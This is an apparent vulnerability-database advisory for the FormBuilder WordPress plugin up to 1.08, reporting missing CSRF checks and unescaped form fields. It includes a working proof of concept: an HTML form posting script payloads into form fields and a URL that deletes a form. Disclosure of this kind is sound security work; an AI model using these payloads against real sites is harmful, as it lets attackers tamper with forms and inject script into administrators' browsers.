WordPress Plugin Vulnerabilities
FormBuilder <= 1.08 - Stored Cross-Site Scripting via CSRF
Description
The plugin does not have CSRF checks in place when creating/updating and deleting forms, and does not sanitise as well as escape its form field values. As a result, attackers could make logged in admin update and delete arbitrary forms via a CSRF attack, and put Cross-Site Scripting payloads in them.
Proof of Concept
Edit a form and put XSS payloads: <html> <body> <form action="https://example.com/wp-admin/tools.php?page=formbuilder.php&fbaction=editForm&fbid=1" method="POST"> <input type="hidden" name="formbuilder[name]" value='A New Form"><script>alert(/XSS1/)</script>' /> <input type="hidden" name="formbuilder[subject]" value='Generic Website Feedback FormA New Form"><script>alert(/XSS2/)</script>' /> <input type="hidden" name="formbuilder[recipient]" value='admin@localhost.orgA New Form"><script>alert(/XSS3/)</script>' /> <input type="hidden" name="formbuilder[method]" value="POST" /> <input type="hidden" name="formbuilder[action]" value="" /> <input type="hidden" name="formbuilder[thankyoutext]" value="" /> <input type="hidden" name="formbuilder[autoresponse]" value="" /> <input type="hidden" name="formbuilder[tags]" value="" /> <input type="hidden" name="Save" value="Save Form" /> <input type="submit" value="Submit request" /> </form> </body> </html> Delete a form: https://example.com/wp-admin/tools.php?page=formbuilder.php&fbtag=&pageNumber=&fbaction=removeForm&fbid=2
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Chiragh Arora
Submitter
Chiragh Arora
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-03-08 (about 2 years ago)
Added
2022-03-08 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)